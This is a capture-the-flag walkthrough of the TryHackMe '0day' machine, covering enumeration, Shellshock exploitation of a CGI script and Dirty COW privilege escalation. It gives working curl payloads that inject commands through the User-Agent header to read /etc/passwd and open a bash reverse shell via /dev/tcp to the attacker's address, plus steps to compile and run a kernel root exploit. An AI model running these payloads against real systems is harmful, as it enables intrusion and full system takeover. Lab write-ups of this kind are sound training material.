0day is a new challenge on TryHackMe that is listed as medium difficulty.
As always, let’s start off with a Nmap scan to see what ports are open:
So we have ssh open on port 22 and an Apache web server open on port 80.
Port 80: Apache Web Server:
OK, so let’s enumerate this website and see what we can find:
Gobuster Scan for Hidden Directories:
gobuster dir -u http://10.10.107.167 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Nikto Scan:
nikto -h http://10.10.107.167
OK, we get some good stuff here, firstly a number of hidden directories that we can enumerate further and also an indication that the site may be vulnerable to the ‘shellshock’ vulnerability
OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).We will start by enumerating the hidden directories:
/secret:
So we have a web page called‘Turtles?’ with a png image of a turtle. Checked for Steg using zsteg but could not find anything.
/backup:
This looks interesting, we have an RSA Key, but I failed to crack it.
Looks like the Shellshock vulnerability may be the way to go.
Shellshock:
There are a number of ways to do this, one such way is using Metasploit; however I was keen to better understand how this exploit works and I found a very good article on how to exploit shellshock manually.
To check if the site is vulnerable to Shellshock, we can run the following code:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.10.155.108//cgi-bin/test.cgi
As we can see, we can list the contents of the /etc/passwd file. By simply using different system commands we could quite easily list the contents of ryan’s home directory.
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/ls -al /home/ryan/' bash -s :'' http://10.10.155.108//cgi-bin/test.cgi
However, what we really want is a reverse shell. To do this we will modify the above to include a simple bash reverse shell. For the listener I will use the excellent Pwncat, as this will aid post enumeration and privilege escalation.
Grab a Reverse Shell with Shellshock Manually:
First set up your listener, as I said, I will be using Pwncat; however you could use Netcat.
pwncat --listen --port 444With the listener running enter the command for the Shellshock Reverse Shell:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.9.6.68/4444 0>&1' http://10.10.155.108/cgi-bin/test.cgi
Bang — we have our reverse shell and we are www.data. The next step is to enumerate the system for privesc. With Pwncat, we can run basic built-in enumeration scripts to see if there are any low hanging fruit. But first let's grab the user flag.
Privesc:
We will use Pwncat’s built-in enumeration scripts, to do this we ‘Ctrl D’ to our local terminal and run enumerate.
As we scroll down the enumeration and privesc results, we can see some potential kernel exploits:
So looking through the Kernel exploit we can see CVE-2016–5195 which is the dirty_cow exploit which is good, as I have used this before on other CTF challenges.
My go to site for Dirty Cow exploits is Dirty Cow Ninja:
The one I tend to use is the ‘cowroot.c’ script, so let’s download that to our attack machine and compile the the source code and get it ready to upload onto the remote machine.
Looking at the source code we need to compile it using the following:
gcc cowroot.c -o cowroot -pthreadAs I am not sure whether the remote machine has gcc installed, so I will first try to compile and upload it from my attack machine.
Using Pwncat in ‘local’ mode I will simple upload the cowroot binary to the /tmp directory on the remote machine.
OK, so we have uploaded the cowroot binary to the remote machine, we then need to give the binary executable permissions using ‘chmod’.
chmod +x cowrootWe can then run the dirty cow exploit on the remote machine.
./cowroot
And we are root, all we need to do now it get the root flag and we are done.
This machine presented a great opportunity to learn more about Shellshock. In the past I have always reached for Metasploit and it was great to take the time to learn about using Shellshock to manually exploit the machine. It was also good to blast the Dirty-Cow exploit, although I am not sure whether this was the intended privesc, but it was certainly the fastest for me.
A very big thank you to 0day and Muirland Oracle for creating this box, I enjoyed the ride.
